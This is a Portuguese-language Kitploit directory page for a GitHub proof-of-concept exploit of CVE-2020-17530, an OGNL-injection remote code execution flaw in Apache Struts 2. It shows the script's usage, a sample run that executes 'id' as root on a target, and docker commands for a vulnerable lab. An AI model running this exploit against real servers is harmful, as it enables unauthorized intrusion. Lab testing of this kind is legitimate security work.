Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-17530 — Prova de conceito de exploit para CVE-2020-17530, uma vulnerabilidade de execução remota de código no Apache Struts 2 via injeção OGNL. Inclui um script Python para atacar instâncias vulneráveis do Struts. | Kitploit
Ferramentas/GitHubGitHub/cyborgsecurity/cve-2020-17530
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingArchived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

Prova de conceito de exploit para CVE-2020-17530, uma vulnerabilidade de execução remota de código no Apache Struts 2 via injeção OGNL. Inclui um script Python para atacar instâncias vulneráveis do Struts.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
43há 5 anosAinda não revisado

CVE-2020-17530

POC rápida para CVE-2020-17530. Em Apache Struts versões 2.0.0 - 2.5.25, uma avaliação forçada da Object Graph Navigational Language (OGNL) em entrada bruta do usuário em atributos de tag pode levar à execução remota de código (RCE).

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

Configuração

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
Baixar ferramenta